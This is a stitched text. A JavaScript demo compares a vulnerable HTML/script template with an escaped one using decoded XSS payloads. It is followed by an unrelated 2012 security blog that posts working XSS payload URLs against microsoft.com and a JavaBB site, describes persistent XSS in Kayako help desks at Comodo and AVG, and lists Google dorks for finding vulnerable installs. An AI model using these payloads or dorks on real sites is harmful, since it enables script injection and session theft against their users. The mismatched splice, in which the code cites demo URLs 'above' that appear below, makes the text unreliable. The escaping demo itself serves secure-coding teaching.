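// Added example: one request parameter, two output contexts, raw vs. encoded.
// Sample values are query values from the demo URLs above, percent-decoded.
const SAMPLES = {
  attributeBreakout: decodeURIComponent('Secure%20Plan%22%22%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting%22%29%3C/script%3E'),
  scriptStringBreakout: decodeURIComponent('%27;alert%28String.fromCharCode%2888,83,83%29%29//'),
  scriptBlockBreakout: decodeURIComponent('%3C/script%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting%22%29%3C/script%3E'),
  attributeInjection: decodeURIComponent('%22%20stYle=%22x:expre/**/ssion%28alert%28/XSS/.source%29%29%20'),
};

// Encode for HTML text and quoted attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[ch]));
}

// Encode as a JavaScript string literal that is also safe inside <script>:
// JSON.stringify handles quotes and backslashes, the replace removes "</script>".
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Constructed template: the parameter is echoed into an attribute and a script.
const vulnerable = {
  input: (q) => '<input name="query" value="' + q + '">',
  script: (q) => "<script>var lastQuery = '" + q + "';</script>",
};
const hardened = {
  input: (q) => '<input name="query" value="' + escapeHtml(q) + '">',
  script: (q) => '<script>var lastQuery = ' + jsStringLiteral(q) + ';</script>',
};

// Tokenise the <input> tag roughly as an HTML parser does: a quoted value ends at
// its matching quote, and the tag ends at the first '>' outside a quoted value.
function parseInputTag(html) {
  const attributes = [];
  let i = html.toLowerCase().indexOf('<input') + '<input'.length;
  while (i < html.length && html[i] !== '>') {
    if (/[\s\/]/.test(html[i])) { i++; continue; }
    let name = '';
    while (i < html.length && !/[\s\/>=]/.test(html[i])) name += html[i++];
    attributes.push(name.toLowerCase());
    while (i < html.length && /\s/.test(html[i])) i++;
    if (html[i] !== '=') continue;
    i++;
    while (i < html.length && /\s/.test(html[i])) i++;
    if (html[i] === '"' || html[i] === "'") {
      const quote = html[i++];
      while (i < html.length && html[i] !== quote) i++;
      i++; // step over the closing quote
    } else {
      while (i < html.length && !/[\s>]/.test(html[i])) i++;
    }
  }
  return { attributes, trailing: html.slice(i + 1) };
}

// Run each <script> body with a stub alert() and collect the messages it receives.
// A script element ends at the first </script>, which is what the breakout relies on.
function runInlineScripts(html) {
  const alerts = [];
  for (const match of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi)) {
    try {
      new Function('alert', match[1])((msg) => alerts.push(String(msg)));
    } catch (err) {
      // A body cut short by an injected </script> is a syntax error and does not run.
    }
  }
  return alerts;
}

// Report which attributes the <input> ended up with and which injected code ran.
function assess(template, query) {
  const tag = parseInputTag(template.input(query));
  const alerts = runInlineScripts(tag.trailing).concat(runInlineScripts(template.script(query)));
  return { attributes: tag.attributes, alerts };
}

for (const [name, query] of Object.entries(SAMPLES)) {
  console.log(name, 'raw:', assess(vulnerable, query), 'encoded:', assess(hardened, query));
}
```

The attributeInjection value contains no angle brackets at all, so a filter that only strips tags leaves it intact; encoding the quote is what keeps it inside the value attribute.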
<b>We would like to add a few words about security. There's no need to panic; perfect security just isn't possible, though we should try to come as close as possible. We would like to give these banks a couple of pieces of advice. They should certainly pay more attention to their IT personnel's competence and discipline, spend their money not only on market research but also on penetration testing, organize penetration testers' contests like Google and Facebook do, or possibly have their own staff of penetration testers. The bank personnel should be tested for their vulnerability to social engineering. These are just the basics.</b><br />
<br />
<b>deviantART Cross Site Scripting</b> (Sony, published 2012-03-20T00:30:00.001-10:00)<br />
<br />
<b>Simple.<br />
<br />
http://verify.deviantart.com/update<br />
<br />
Email Address: our xss code.</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-dOuwVZ7dq8g/T2hbnpfrJ0I/AAAAAAAAAxU/cJCTGiG5kgs/s1600/devian.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-dOuwVZ7dq8g/T2hbnpfrJ0I/AAAAAAAAAxU/cJCTGiG5kgs/s400/devian.JPG" /></a></div><br />
<br />
<b>Microsoft.com Cross Site Scripting</b> (Sony, published 2012-03-19T05:43:00.001-10:00)<br />
<br />
<b># Date: 19.03.2012<br />
# Author: Sony and Flexxpoint<br />
# Web Browser : Mozilla Firefox<br />
# Sony Blog: http://st2tea.blogspot.com<br />
# Flexxpoint Blog: http://flexxpoint.blogspot.com/<br />
..................................................................</b><br />
<br />
<b>For Ryuzaki Lawlet:</b><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://s.rimg.info/dd4118cdca0289ab90bcc951bc3f1c72.gif" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="30" width="35" src="http://s.rimg.info/dd4118cdca0289ab90bcc951bc3f1c72.gif" /></a></div><br />
http://packetstormsecurity.org/files/110597/Microsoft.com-Cross-Site-Scripting.html<br />
<br />
Demo:<br />
<br />
http://www.microsoft.com/windowsphone/en-us/buy/7/compare.aspx?devices=%22%22%3E%3Cscript%3Ealert%28%22XSS%20by%20Sony%20and%20Flexxpoint%22%29%3C/script%3E%3Cscript%3Ealert%28%22Oh..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Uh..%22%29%3C/script%3E%3Cscript%3Ealert%28%22wow..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Microsoft.com%20Cross%20Site%20Scripting%22%29%3C/script%3E%3Cscript%3Ealert%28%22meow!%22%29%3C/script%3E%3Ciframe%20width=%22420%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/SLcBI3JUKZ4%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-iQT5Ywe2XL8/T2dQ--4a5WI/AAAAAAAAAxE/IdkN2KNwze4/s1600/microsoft.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://3.bp.blogspot.com/-iQT5Ywe2XL8/T2dQ--4a5WI/AAAAAAAAAxE/IdkN2KNwze4/s400/microsoft.JPG" /></a></div><br />
<iframe width="420" height="315" src="http://www.youtube.com/embed/4kJL2Rt-FKo" frameborder="0" allowfullscreen></iframe><br />
<br />
<b>JavaBB 0.99 Cross Site Scripting</b> (Sony, published 2012-03-18T04:32:00.002-10:00)<br />
<br />
<b># Exploit Title: JavaBB 0.99 Cross Site Scripting<br />
# Date: 18.03.2012<br />
# Author: Sony<br />
# Software Link: http://www.javabb.org/<br />
# Web Browser : Mozilla Firefox<br />
# Site : http://insecurity.ro<br />
# PoC:<br />
http://st2tea.blogspot.com/2012/03/javabb-099-cross-site-scripting.html<br />
..................................................................</b><br />
<br />
<b>Well, we have a cross site scripting in JavaBB 0.99<br />
<br />
Demo:<br />
</b><br />
<br />
http://javafree.uol.com.br/pm.externalSend.jbb?userId=42888&username=teapro%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-66dUUOLCT-A/T2XxgUTFp1I/AAAAAAAAAw4/zz2wzSeHuhg/s1600/javabb.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-66dUUOLCT-A/T2XxgUTFp1I/AAAAAAAAAw4/zz2wzSeHuhg/s400/javabb.JPG" /></a></div><br />
<br />
<b>CarChat24 HTML Injection</b> (Sony, published 2012-03-17T20:28:00.002-10:00)<br />
<br />
# Exploit Title: CarChat24 HTML Injection<br />
# Date: 18.03.2012<br />
# Author: Sony<br />
# Software Link: http://www.carchat24.com/<br />
# Web Browser : Mozilla Firefox<br />
# Site : http://insecurity.ro<br />
# PoC:<br />
http://st2tea.blogspot.com/2012/03/carchat24-html-injection.html<br />
..................................................................<br />
<br />
We can see a simple html code injection in carchat24.<br />
<br />
Click on the window and put in our HTML code. Not a critical bug, but it's a bug.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-0HC1S1XH_10/T2WAceDT7FI/AAAAAAAAAws/IVjCqBQLxkA/s1600/car24.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-0HC1S1XH_10/T2WAceDT7FI/AAAAAAAAAws/IVjCqBQLxkA/s400/car24.JPG" /></a></div><br />
<br />
<b>Comodo.com and Agv.sg Cross Site Scripting</b> (Sony, published 2012-03-16T20:36:00.011-10:00)<br />
<br />
<b>Important:<br />
<br />
A similar bug was found in Kayako Support Suite by Positive Technologies:<br />
<br />
http://packetstormsecurity.org/files/108595/Kayako-Support-Suite-3.70.02-stable-Cross-Site-Scripting.html<br />
</b><br />
<b><br />
Today (20.03.2012) I received an email from Kayako, and they reported that the bug has been fixed. You can read about it here:<br />
<br />
http://wiki.kayako.com/display/DOCS/4.40.985</b><br />
<br />
<b># Exploit Title: Kayako Fusion Cross Site Scripting <br />
# Date: 17.03.2012<br />
# Author: Sony</b><br />
<b># Software Link:</b> http://www.kayako.com/<br />
<b># Version: all versions</b><br />
<b># Google Dorks: inurl:Base/UserRegistration/ or intitle:Powered by Kayako Fusion Help Desk Software<br />
# Web Browser : Mozilla Firefox</b><br />
<b># Site :</b> http://insecurity.ro<br />
<b># PoC:</b><br />
http://st2tea.blogspot.com/2012/03/kayako-fusion-cross-site-scripting.html<br />
<b>..................................................................</b><br />
<b><br />
Well, we have a cross site scripting in Kayako Fusion.<br />
<br />
Our xss in /Tickets/Submit.<br />
<br />
Put our code in all the fields and press the Submit button.<br />
<br />
Click on View Tickets and open our ticket. We can see a Persistent XSS. </b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-XIol_NGfkY4/T2QwnI6O1yI/AAAAAAAAAv8/VocNLueIcSI/s1600/yeah.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://1.bp.blogspot.com/-XIol_NGfkY4/T2QwnI6O1yI/AAAAAAAAAv8/VocNLueIcSI/s400/yeah.JPG" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-hSBqYUG9mVk/T2QwrC7SfeI/AAAAAAAAAwI/t3VfDrmnsUc/s1600/yeah2.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://1.bp.blogspot.com/-hSBqYUG9mVk/T2QwrC7SfeI/AAAAAAAAAwI/t3VfDrmnsUc/s400/yeah2.JPG" /></a></div><b><br />
A lot of web sites use Kayako Fusion.<br />
<br />
We can see Comodo</b><br />
(SupportSuite v3.70.02)<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-NuPPTVnYUKA/T2Qw2JbVMQI/AAAAAAAAAwU/ilLYojJ_gus/s1600/comodo.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-NuPPTVnYUKA/T2Qw2JbVMQI/AAAAAAAAAwU/ilLYojJ_gus/s400/comodo.JPG" /></a></div><br />
<b>Avg</b><br />
(fusion)<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-e3EFHjpd_f0/T2Qw7WMsNYI/AAAAAAAAAwg/MvkVl_n8fhQ/s1600/avg.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-e3EFHjpd_f0/T2Qw7WMsNYI/AAAAAAAAAwg/MvkVl_n8fhQ/s400/avg.JPG" /></a></div><br />
<b>etc..</b><br />
<br />
Russian Google Dorks:<br />
<br />
intitle:основано на kayako fusion help desk